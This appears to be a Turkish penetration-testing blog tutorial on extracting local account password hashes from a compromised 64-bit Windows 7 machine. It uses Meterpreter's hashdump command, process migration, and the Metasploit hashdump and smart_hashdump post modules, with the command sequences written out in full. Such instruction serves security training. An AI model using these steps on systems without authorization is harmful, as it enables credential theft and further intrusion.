Windows İstemci Bilgisayarda Yerel Kullanıcı Hesaplarına Ait Parola Özetlerinin Metasploit ile Elde Edilmesi

Windows sızma testleri sırasında Metasploit tarafından sunulan komut ve modüllerle yerel hesapların parola özetleri elde edilebilir. Bu yazıda, Meterpreter “hashdump” komutu, MSF “hashdump” post modülü ve MSF “smart_hashdump” post modülü ile Windows 7 bir istemci bilgisayarda bulunan hesaplara ait parola özetlerinin elde edilmesi incelenecektir.

Yazıda incelenecek olan bilgisayar 64 bitlik Windows 7 işletim sistemidir. Bu bilgisayarda elde edilen Meterpreter bağlantısı aşağıda belirtildiği gibidir. Meterpreter bağlantısının 32 bitlik rundll32.exe adlı proses üzerinden SYSTEM haklarıyla elde edildiği görülmektedir.

ps -s
getuid
getpid

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-01

Her bir başlıkta incelenecek olan tekniğin çıktısı bir biri ile bağımsız olduğu, ardışık bir şekilde listelenmediği göz önünce bulundurulmalıdır.

 

Meterpreter “hashdump” Komutu

Proses 32 bit ve işletim sistemi 64 bit olduğu için, Meterpreter “hashdump” komutunun mevcut durumda çalışmadığı görülmektedir. Bunun yanında, 64 bitlik SYSTEM yetkileri ile çalışan bir prosese sıçrandığında ise Meterpreter “hashdump” komutu ile parola özetlerinin elde edilebildiği görülmektedir.

hashdump
migrate 1924
hashdump

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-02

 

MSF “hashdump” Post Modülü

MSF “hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “hashdump” post modülünün seçenekleri aşağıdaki gibidir.

background
search hashdump type:post platform:windows
use post/windows/gather/hashdump
show options

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-03

MSF “hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.

set SESSION 1
show options
run

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-04

MSF “hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.

run hashdump

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-05

 

 

MSF “smart_hashdump” Post Modülü

MSF “smart_hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “smart_hashdump” post modülünün seçenekleri aşağıdaki gibidir.

background
search hashdump type:post platform:windows
use post/windows/gather/smart_hashdump
show options

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-06

MSF “smart_hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.

set SESSION 1
show options
run

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-07

MSF “smart_hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.

run post/windows/gather/smart_hashdump

obtaining-password-hashes-of-local-users-on-windows-7-client-using-metasploit-framewor-08

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.